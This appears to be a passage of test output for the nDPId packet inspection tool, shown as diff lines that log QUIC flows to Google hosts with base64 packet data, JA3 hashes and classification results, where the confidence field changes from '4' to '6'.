00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1621431355629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431355629,"pkt":"AAAAAAAAAAEAaACzCABFAAVipRBAAH4RM2+okEAFZsLPs8kAAbsFTgz5x\/8AAB0Ipr6cuikmNEMAAEU0i0hH+cAdz5ZZK\/xgszII4NJ+Cs\/TRSxsD\/59bGzAHONnn6j+X3amElYhYMo+go49s13dC+nlDHUdymxgbgfhGCJjdyT9TzcGgD1HhFldjuPuqaUqb2U+e5hIm7ZwKR4IiSdw5myr6wLeQGKnRWRznbKdv0\/S8qhtnacEzUWkRbgLNZB6UrIuIb3\/XF61ze+uu1oQFMqs\/98rtD2Gush\/bOd4PCp75DHjTM7vEePRlMktunxdIh3uhOzgWNKSQKJT0NAyTU7NxzeiF3GfRej2\/kZ85CVwTrCrF16rxPwjm9ETk7onwTP2SJN9jSLLXtE8HLoGNVYKwKhEtDy7juZS+ZzakAkwGM40iWULaV8JHp3tnl4HFGHlYIam6j9\/x\/pkFvR97oZ4wzOV8R3kk4Ra7CeuS8G446n4JShwKYpq8P1sEbgLA0Q+fIXUmPEN7zq\/oW\/SjwuvXJSpkHba6nxwXOq9T2kwGi2sisBu9OUPhX+jksGDs7ufRR3uLnbqZloU9ve7ujWkOVy8l0mz6YekjKqsAnkn1AHXrNbiuNq3lfNWMOdFJMSCZVvRNOSxLp0vTEGoqQhPMALOnaZWkaB\/IYt22cFqUAekqyAVUEGfqiGt6h9rCpzV8lGyjNf1CoZnWFNQvZHRcUd0E0mwSijEO\/8qx\/3uH7V1emFiAJLB37Dab2xZnuNuUQ5y+bJoqPPXPlpeEf9N2vgb4V1z5g\/MMBLG41lXjcqJeJWiZvymJ1H3KCTyAX75xQGo9dFLeD8l8p7GaWhBKf6VVbpWbM2nvE4+lRC2IaGF4F5M+5QC4RODSGaHlCcroOJfhkPdPiQrLTk\/7S0AiJhOEEoxKs5rmjMJWHbOhMEmV2Uqjkwlipc94JjyYJ2kxfN3X0UT\/S4dmpbMytDlXm2P3piCB\/MLrm+e9saulhmLDTxI5H7sCO9NK8mugUOQqCu4A60KTwRUiaJW97RDku8KM7tNRUwdkA7m4N6y8rHQhIH4ocpzig55LxPWT5XZqJmtqcBDZzFQl61yCq0MRPJez5meDXJITVqsdC8fAKML2\/9BBA6p2fme6P1rzQPoj+L2OOAcsG1lD15uPkM7J4XMlnbWRKz5t+5U5cCLF\/FyZV6ikFZeMEUbfhZVFVez5O0b7ArQykKFskvw5ow0nPTWFs3RhbSkruVVy+CP7T20ld2Zoo3waO1CAhdyywLs+WjgaBeB6BJYKM6gxS4fW8wzOgcaq4G2GqkD3m4pZqaaELLxGOxDCmCzO0QCG9M6jpfPOKsOfPc5ynpr4aPju6JGtl\/z+IPQNUX6dMyprmtEVvzlezA5hXv1FOS9Bu3pJnoRf0c1aYbjlC2uFltDff+w4\/xv44mcnP49XC51ZyX8YG\/WwlTNT+Q+PSx8mlKvW7CnX5u232hGz8LR+K7zeWVVpOleSv30hmVlH6Y4OuVkNecB2PlodVOjeqdjRSRxqRsLbcq
LCC9cOmgjc\/ohryRRJQyMJtXeWbDrdqNKdq1pDxsuJ4wwMBMesHq4H0mEc4PlhC8w6AbhwgQpeeSZn5X2ZrFQy5Ipg3+vRKwYL\/Mi3kjrs2fSPNxarNRLlKyoY7f4hw2NjTzNWp0j2aXeNoKqTjDtXyit70tR4YqLzkn9C0xp0mUo9nxF4EWJdmjCX0ANdhrJMcQX5aRmmU+t3M1w1Bgicj3DEsU\/1FRB7DjmpdgCWCW4r5M6W6LkewBSsNiNSC3DnsTbf6eTU4wOue5\/0G7VJOcj6q0duKzEYYTXcoYAbuKiXnvE4OcU"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431355629,"flow_last_seen":1621431355629,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431355629,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":51456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1621431369135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431369135,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+m5AAH4RGJmokEAFcfqJ8\/a7AbsFTuukwf8AAB0IwkoI2nuQHYUAAEU01K7fN93B4MUASGiXGUyARwSY+4aO68HNYjEt7GWPzfJckCAv1T4i5dLLPnKrxPNl7uR\/wsXzoosnnjNfCeM6JnFogGoD8Fd67g3pBz\/4xd9MrHK8spfp0sKR5PgUqqWOgvCutevbQ8qYXNVgijT5\/8AiGcOOHWAx5JOe9WKc+HYLYWnuE5L3HEZQo4nrWEMko3D15BJbkyW22cYvauBzrX7Zq2OYwnKGwfvfdTYQGFwBMKheaRrgDFFEbI95H6nND\/F7o65wah9YFCBHrCZCULES1ZD7GJY\/Bqf\/MjcEld0g3C+HvcIVjENbzsXizvCuDmTJV9YcPMpv9s382puliOWP4gOQWgoAG3Ao6cfEvPQFaiuvHkR1sXIVJDapx4gQAa8qedAjI4Qk9A2tznfUat8eb5YjNDd00djuz1xXJ1+7\/xnEryQeYx5B9q0Yh4cp1f8Mpm8PkVLPsaI5EJD7Bo2TjORoihUYfLnocxxlk+mWTWVOcQW\/cjslUg1\/uOKIPppK9Zo0xPvYv4LI237JcA2TOoJFeS2HbNf22y6wRXsJR7Z1jYbJCoLzvh8chtuZ6AA0Jcfp8DQO6eEIRfW\/h5u
scIqr7vrdGBDh5\/zvBHXMvSXwUSNMs9ju24jzW8z9yJsqxVYmitvQJ7dOrLH\/K5mn71oTWSfLy9yPsyJGefj4rQHs6usmcTj3v05Oe+rdTxkAwaXEjfHjw7A18cRPFLq1e7XPVF15OaAIZGGJW+X9C6SnLNTHrGmlAeBe5bF1NxyJ8XbUSvQBp1NyQhLMJ6GHeTnqG2+oKcMtLlDqhrjxBcqwGzBORNaeIk37oEDvRj2ULgb1Cu19EZ8tiMvhQaCqwm6eg\/krsi8k4E\/id\/90KGowDX\/Pr\/s1sAND5Dh+Md7iwKz3tFkcVqiC9XKQGYvwvrNl3M\/DVbx88F8Mq1fhBPFp75j4duggfbVz4fePFTUYQyXEdkFrbprYYprY3G2nbXPGgbmp+\/keXeMNgYEi7eCqoK5MGIiI5kYO52LEu7uBHu6gfW0a\/oN3u8Hg87YiAKF6G4HUNDN7ak+kYj0Gg+8\/osNPKdMNnn3Ttq+e4FpeaVuPQtri+1\/ozlT88MEsTrI4ZjcLkQrdsDGrSk5pFNuuaNdnBxmLTD9+Y31TuPjZdF3y8aerRjGjcKA924zFY6F3+erxKilvfVdWBBMq\/sZv6Vksw\/+Fz1wttZxo9VEZshnZyBhQtfaWNbpCUMCLWSIOTygpzB56\/djZxzMToQ0OTov79H21iuzt9kW26NuI44K+W4r3zJK44FZlurMlKsoEREV+b\/FORcM8avXBcW20SB9dZBdfAIWoFzST8hpkmnW5KzJkqUXpqJQJHsur9uW7QvcJJs3nF\/XtsYVO7wfuWlEoUZSI7JS9k\/vtrqWVy2X+CigTWqjVYJhzagu87STW7dgMdyFPWLSjmBjeACNJOqSiLuLI6nqP7AToDkXf2o2wX1ea4tL+l2elnz8UUQ0mwPbx3D2flZoxja8QhG\/H0Dkv\/zqHUfQXS1ey7dOzI0gQWGL2bong5dY9vIH\/KH\/EE5WN9+MZTB5oOqSTzGQ0G10wtkmcpl7cceFjmLyC\/CPGRf1WcWpg0St7TVzKyiD9jSy7E7M+Mef3DDpD6ufY+IM3YsYXJiOqBLz9Mad7YJnU4xywy8xIlHMAZnyk840yn2AImi8yGcKAuOx8ekNKD\/3YSrti2Nd30LJbAbXW+9aUyCWGxhaYhZKKyYrgwwNNaQQ6T+r69Xv\/AhEpDvcH"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev 
Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431369135,"flow_last_seen":1621431369135,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431369135,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":63163,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1621431370645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431370645,"pkt":"AAAAAAAAAAEAU0VlCABFAAViMu9AAH4RJlaokEAFmWIcTtMAAbsFTkg1z\/8AAB0I+lN8UldDPwoANwCkKLl+3h3UHIQgS3vcwcXrZ6T5hiytz4Q4TWQ7pmsAJO5xTHpseYqRKlKHmxme9TRfa47qWTNE\/T2kS0vQRKN+NvKsLSu+R20pLtVijhGmejNVjxQkpOqlEUNcFIHcN2wzhOdXdZI9UF3VUhNkOijfbeykwXjQP1\/nKm9mO0G\/ypc7Y2OQX8KQjJvTKmxfJgoiRMmIZd66ehWzpVA7ADDpyDredKxOTaDSAYoR9nNN9ch6nx3ZMTTXTycMrWty+BPeuRbrkASH1HytOMULRsu12u6n42QgaeYSvJl7RKIje\/FCPE4VKoS2bBqDGJdyFYhy9WpCdBYHFXRsvzage9S\/AuIhACnspXakPoSAAKTsCYsy7O8Xfk5D9YcZNZIWuP2P5LmgHVsAyYCWuB0zDz\/P\/niv7vxRu76Gc2OqQjwDwC1yI28dLAM1\/qVCYRFk9YMbF\/iD7Nsy5jvI9F\/PUuc57iiKLeU\/x1YGOwxmbb1YAjhXgnTaAuvlp4rcuFTF\/jkRDZDwvS0ElQbZ1sDIOXoAhaFOvXD0EKhqtqXAu8QvhDZA4eNLtzEFYCKh+iIymyxHd3zWX+3NxjMpE9Ns6UHSd84eMRpZcGmgG02e\/nW7OJALJ0IxLfndoUAlJk4IvuZcxngA9k\/unBNCOAlRVhFhhDnD4zD9WKXcfMQ8zOFHhmGS13WBEjy7kK3uLOIS3qui39MawSxNS7Ml6mSKoaSyb4+SNDLXoJWz3B44z0+hVh4WwxeJPSZ7w0VPVgCLDMcbCK1ByAz8JXWCFN83+GTRF5hMdm4dISfNt7qLcE3DH5CsDA+yUGakDromNlDnPMXyFA3nBYHp4IXGe9Qb9ePX1Y\/SndfWnyp3BEETdFg9vGIGsMMkmqU+J5mYsWQmYX5\/h7SfM4llXroWubSp8gBiYn3ZEiVxAgaNGqIripZvwoMsqPR8pCBgu6y3F8BYlwrVh+ZxYeOX5ab1qs+HTR\/VqeeVG8Eay\/MH5IQteK\/x80AjKjDmsExVlZ9Yvq1ASQtfskSMH0GMY9POIkrjW7EvJxN5wK\/qGiieo8H6mYS7uXrxZHkGc68vVyNWX9p3QoffUgaN1rL++0wS2CIvPmNLRJCwPEEWdTb37V1X6bBSAYmxZUUOT8oUGnsozk6dfMeAsBVRYGBaFG9+Y1uHxPYwvKwCvo+pVvLyi9jA\/MUPqdH5HKAlVkIxZHfTN0TbmkKqYM1+\/dGw42Opggft9Ujn+E6Te2o7P21d6\/4ziedAj7hW\/ducyroIUruOxK6kZkZIfc1rfDtpstdc1OwhsM8efvN8mSqQCgneDcWSXy4bE3JNAWNwVmsvgrlZnik2Id38oh\/fD8oub9PI\/kmIUiP1uSKBBkJyEnZ\/+uDpCaSemLo73IkSmAKSVsNdykI61VqMLJEb+fNx3Qf\/\/ppmJTj9\/JSXpVaRHvFY4L8IDk53+jFdIKFjZmAbM
yUI5v3Br8tILw49LDtUwMV8TUdpFD45PjvSQ+YyqLq+OuacdGaLpMcBrUOmuMqWWPYG89KlxtPyViKOZQDTS8sb2EBEHN8hGk3fUXt1bo+FE8NSXvIg7NRqP5Nv3yrdaqPCA7cxMCsT0Z4cAs4COX\/fJ4v3Qpyc7hbzFiy9BZYDLGPjdm9XGzS14zLvvjA8ujJQXVu8\/cqxKCkP5AWXvVW61iwAkR3yFCXIjI79f5ml9EjzFluSxM8yINcpyXkiGxaLUSehYQkeNBr1bVFEIJq2IJOjgn8tdoygPZ\/Ggtxsz4Ympsa29lLPp\/1R"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370645,"flow_last_seen":1621431370645,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370645,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54016,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": 
{"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1621431370796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431370796,"pkt":"AAAAAAAAAAEAWIVLCABFAAVimjxAAH4Ri5mokEAFYyqF9cgwAbsFTgeRwv8AAB0Iy4aUElydjLEAAEU0cgy7g6waI4s\/Db31CXMNLtpBLCBMqbNNIERpncwoj\/mzw930r9KSGtTDq0Un\/reM90\/o2LMUXhAxGEjpV8kM2isFWzwDO4KLtdnvjoVU\/jW5X1cAIJGi224o+IBoqe\/q3MhszxPlHqwkUkoHgcWP8rFY11sIccKhMsLy4OlgMZHEtOM9cK6MhXXnbI4PIfeHbKw3eQF9bmAITBhN2hEUuCQ5tkEGA44Ny7kWGmEH8N+oonqrQFSRfhvaY3aPSuVRpbZIPtuPu5FfCgb9SlrhiL+YFIGOqSPYS1Fga7DZceldELqsQnht1L6sPyvDZGhFHGevrPqJKYsG5AJ1dz0CBKyRoEBiPDMdvlFISahZktRsu1zHBcqXO6dH\/i8qaCuLB3C0cU7Mf84KfPTeo\/gsTws0xYHHMgBbeLbnL3UFA5r6TMOj9bItn6l59owKGAThBrdETsc3kNqb2EaYZyfxOIPnMT50EN3E5+o1NkgWuOzUcI4wNbi\/tPHdtNay4zsdQpx+v0mHMwKaNOaS1cXTI5EglEP9nh0+7Pd14q0LRBQ3DeciSithO1E4K1W\/Z4sWicTGPnlHMSkhRPDqwcMrqZYI65EaAXb2hwQHTLQOC3yEO
m8uj32O6iPw1kmWecebjTAhzoITApAhOJNqbhOhmL3LYzlMNpCxKIbZWwXYI7KE\/nyX+9ktlfBgqL7lMUB\/nzCvI8L8RT\/TyhNdGRodyYga3YaHfnznNluGiCWRkzVsHTXG5IbNbGj69KA73CTFlz3wgsOw1uHC\/q3RChP7l2qOfWKIMtxcvHriXoLF\/vYMzoqEm8pCiWCoZMnY39DH0b5dzrRQCWGNuyliasUzdNwfCWtlCp7bb4qxiMpsXc+uNU+g2bw+VTTlx1U6pmIskkdKx+mP5J+pvDAUA8T3JVvzUY7NyB8IEQ0IbbpFr4IAdnh2CDfm\/3LkeBAfOpK4ISFWDT\/Zq8xGBrTh4yq\/7VJSuZCIU6mdUPZvVTVYBmdKXePmLICT7JVQHsyS6MxIt1eR8vw5vXsNJo11Hj6NXO8R3qnkStwD3Hp1s8H3wRtuYv0txfoYvO+JQlg0ebqSA11uOBMpoISeySuHozQ8oCCsnJndgourEdZSSgF1xkc5zlxohntckX9YYRJuzAJGjDN4T1wfrPFQyenplFLZHMDpAhiV7Te3CCs6SKS28MBI6cwMwV1jZ4JX4bfrUb5Sbdar5XQqw9SbBJFJJmemfZlNvZabnR9m9F8aNRgxnvKtrT\/oN6gP7nsRQo4l8nySxze1hd0tyD8+tMuNQJRNnwq\/z6am\/OObDrBsZm3FIBJGoG3zuBmWjHfo9F91ajEKf3cpkFlxxZkkSD9hD9i3XpaytXko+K4WOBWAhjq6wftsLdQLBpeCv6ZMwSeTt2tPaiX6D3HlJiyhzzjMup+ygJV6xano1oW2u\/3nyWiYV0GHV+b5y0lkHYM1dgiTaT2KrSOD3IRFXFcs9y8cNjsa5kJDBFFwGRXnrEEfcCFRxk12riHmlcId3GMVfy4P0YANskdNyw2M+xiEcOkt6DL850Uen9ExlETBFpaBh9C+ABSY+1ty8tYaL3zfMeNRiFgkNZZN1r942JOKKotMtpCq+6AVsdDiJcE3TtG4YJZ2yTO5bCLeezzQEhXvpEnuAz6dq59BUrxZNWOqZ8HHhEXq3N82ukDRJgBUvK0NQJTyZjgLcV\/Y6DWk0EO9WY2nkKr38\/Agezi3TaatfB4TRt19446lztdcfJd7DYB6DWTlmwbRMquv"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; 
x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431370796,"flow_last_seen":1621431370796,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431370796,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.42.133.245","src_port":51248,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431431363,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1621431431363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431431363,"pkt":"AAAAAAAAAAEA737VCABFAAViT5FAAH4R4cKokEAFLeSvve3gAbsFTo4zzv8AAB0IdJfsHA8rg\/UANwBZgvMHq3AV4dyxbh1M7qxYXz\/QqdNTBH1HN0CS98tw5ggQc1OjegApOEUGthGeOLQM+rNmjRhE\/clLK4HuBl1LUEre0au1gZTt1KqH6IUxZKrE2sGM+Fqy7i7mdjukue2Wu9obDV8t84mfBGQvFDIc4C1GtNO91WWUABZgT7OXtAGbDvKSc6M0BxmN8Ta9If00OJSKfKhlAsrhpMyMxJleFReMHQ4vg3EHhEg3\/NEef0p7Zb8BSIABFdcX93ZJbQwy+tHFaBeQPW5hn0M6xbNjf\/RY8iKGm7C2EQaLG\/adPJ1obLE57u5xg+UA+iXg0DYCJwxxRWfvhsQNGcUILv1KPQmWIddwcM+oBfVZ7KRAyWk+0AiZGEtw5sCcIbEGLLWCyvoCaVrzFwX4Kxz3c7epqJFIX\/G4r4+8H23LqwgKdJlZseYuGRd9WZ17cAlMwRxkcaXk6EXP9kebqJHJ3dsOkzIicKHPAuN+sTLUfuCH9AK8a\/4BqLh0qhEbE4oM2O7m0ZqtxPFpAd5AdDOcmU0hU21c5xII4eHDJKcgQfeUv8B8IfJzEDaXWMwoJj4d4vPmcte8bu\/qmXZ1s8mPqlbPtjg8e7kqLmBzoI9FINBrXqlwZ15IYu8U9PmD0+zaeALYJjz54xNHN5vMvsd1bG1xBVwnOw1yRR07LgIALUvx1jSrXJCtvK9x3n0e17\/4XbEbU23L0VEkeWuLpyKfzxELjZtRJEtpFPK65Oka98APYQk+cvApo4Lv78agQ4isgrdWL\/lPZZz4e1uzhC0FBRUgyvNQPK2FuPLSh6vnlitflvFrugGvGJPfCcZvXgSXYhz6PyAu6ucrDkSDkrlCeDqiN